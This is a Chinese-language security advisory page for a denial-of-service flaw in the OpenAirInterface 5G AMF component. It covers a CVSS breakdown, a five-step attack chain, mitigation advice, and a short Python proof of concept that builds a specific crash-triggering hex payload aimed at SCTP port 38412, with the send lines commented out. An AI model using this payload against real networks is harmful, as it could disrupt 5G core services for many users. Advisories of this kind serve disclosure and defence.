CVE-2026-30077 CVSS 7.5 高危

CVE-2026-30077 OpenAirInterface AMF拒绝服务漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30077

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenAirInterface AMF

漏洞概述

OpenAirInterface V2.2.0 AMF组件在处理特定消息时存在解码缺陷。当系统接收到特定的恶意十六进制数据流时，解码过程会失败并触发崩溃。攻击者无需认证即可通过网络发送特制数据包利用此漏洞，导致目标服务不可用。

技术细节

该漏洞位于OpenAirInterface V2.2.0的AMF（接入和移动性管理功能）模块中，源于消息解码逻辑的不完善。AMF负责处理5G核心网信令，需解析二进制协议数据。在解码特定输入时，程序未能正确处理异常字节流（如 `80 00 00 0E...`），导致非法内存访问或未捕获异常。由于CVSS向量显示无需用户交互且无需认证，远程攻击者可轻易构造恶意数据包发送至目标AMF接口。解码器解析该数据包时发生崩溃，造成进程终止，从而实现拒绝服务攻击，严重影响5G核心网的可用性。

攻击链分析

STEP 1

侦察

攻击者扫描网络，发现暴露的OpenAirInterface AMF服务端口（通常为SCTP 38412端口）。

STEP 2

武器化

攻击者根据漏洞描述，构造能够触发解码错误的特定十六进制数据流（如 80 00 00 0E...）。

STEP 3

交付

攻击者通过网络向目标AMF服务发送精心构造的恶意数据包。

STEP 4

利用

AMF组件接收数据包并尝试解码，特定的字节序列导致解码器逻辑崩溃。

STEP 5

影响

AMF服务进程终止或重启，导致5G核心网管理功能瘫痪，实现拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target configuration
TARGET_IP = "127.0.0.1" # Replace with actual AMF IP
TARGET_PORT = 38412      # Standard SCTP port for AMF (Note: requires SCTP library usually)

# Malicious payload extracted from CVE description
payload_hex = "80 00 00 0E 00 00 01 00 0F 80 02 02 40 00 58 00 01 88"
# Convert hex string to bytes
payload_bytes = bytes.fromhex(payload_hex.replace(" ", ""))

try:
    # Note: AMF typically uses SCTP. This example demonstrates sending the payload.
    # In a real scenario, use an SCTP library like pysctp.
    print(f"Sending payload to {TARGET_IP}:{TARGET_PORT}")
    # Example conceptual socket connection
    # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # s.connect((TARGET_IP, TARGET_PORT))
    # s.send(payload_bytes)
    # s.close()
    print("Payload generated:", payload_bytes.hex())
except Exception as e:
    print(f"Error: {e}")

影响范围

OpenAirInterface AMF V2.2.0

防御指南

临时缓解措施

如果无法立即升级，建议通过访问控制列表（ACL）限制对AMF端口的网络访问，仅允许内部可信网元通信。同时，部署入侵检测系统（IDS）以检测异常的数据包特征。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表